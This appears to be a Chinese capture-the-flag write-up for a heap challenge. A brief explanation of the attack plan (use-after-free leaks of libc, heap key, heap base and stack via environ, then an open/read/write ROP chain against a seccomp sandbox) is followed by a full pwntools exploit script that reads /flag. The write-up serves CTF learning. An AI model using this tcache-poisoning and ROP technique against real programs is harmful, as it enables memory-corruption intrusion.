image-20240329153906442

开启了沙盒保护。

所以利用ORW。

攻击思路

存在UAF,所以利用就比较简单。泄露libc,泄露heap_key,泄露heap_base,然后利用environ泄露栈地址,再申请到栈区,覆盖edit返回地址为ORW的ROP链。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
from pwn import *
from ctypes import *
from libcfind import *
from LibcSearcher import*
import base64
import sys
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux","splitw","-h"]
debug = 1
if debug:
    p = process('./pwn')
    elf = ELF('./pwn')
    # p = process('', env={'LD_PRELOAD':'./libc.so'})
    # gdb.attach(p)
else:
    p = remote('node4.anna.nssctf.cn', 28531)
    elf = ELF('./pwn')
# -----------------------------------------------------------------------
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
pr = lambda num=4096: sys.stdout.write(p.recv(num))
inter = lambda: p.interactive()
l32 = lambda: u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00'))
l64 = lambda: u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, '\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, '\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
# -----------------------------------------------------------------------
libc = ELF('./libc-2.33.so')
def add():
    rl("Choice: ")
    sl('1')
def show(index):
    rl("Choice: ")
    sl('3')
    rl("Idx: ")
    sl(str(index))
def edit(index,size,content):
    rl("Choice: ")
    sl('4')
    rl("Idx: ")
    sl(str(index))   
    rl("Size: ")
    sl(str(size))
    rl("Content: ")
    sl(content)
def delete(index):
    rl("Choice: ")
    sl('2')
    rl("Idx: ")
    sl(str(index))
# gdb.attach(p)
for i in range(10):
    add()
for i in range(8,-1,-1):
    delete(i)
edit(0,0x1,'a')
show(0)
rl("\x0a")
libc_leak = uu64()-0x61
lg("libc_leak",libc_leak)
libc_base = libc_leak-0x1e0ba0-0x60
lg("libc_base",libc_base)
environ = libc_base+libc.sym['_environ']
lg("environ",environ)
edit(0,0x1,'\x00')
show(8)
rl("\x0a")
heap_key = u64(p.recv(5).ljust(8, '\x00'))
lg("heap_key",heap_key)
heap_base = heap_key << 12
lg("heap_base",heap_base)
edit(2,0x100,p64(environ^heap_key))
add()
add()
show(11)
rl("\x0a")
stack_leak = uu64()
lg("stack_leak",stack_leak)
edit(5,0x100,p64(0)*2)
delete(5)
edit(5,0x100,p64((stack_leak-0x138)^heap_key))
add()
add()
pop_rdi = 0x0000000000028a55+libc_base
pop_rdx = 0x00000000000c7f32+libc_base
pop_rsi = 0x000000000002a4cf+libc_base
open = libc_base+libc.sym['open']
read = libc_base + libc.sym['read']
write = libc_base + libc.sym['write']
payload = p64(0)*2 + '/flag\x00\x00\x00'
payload += p64(pop_rdi) + p64(stack_leak-0x128) + p64(pop_rsi) + p64(0) + p64(open)
payload += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(stack_leak) + p64(pop_rdx) + p64(0x50) + p64(read)
payload += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(stack_leak) + p64(pop_rdx) + p64(0x50) + p64(write)
edit(13,0x100,payload)

inter()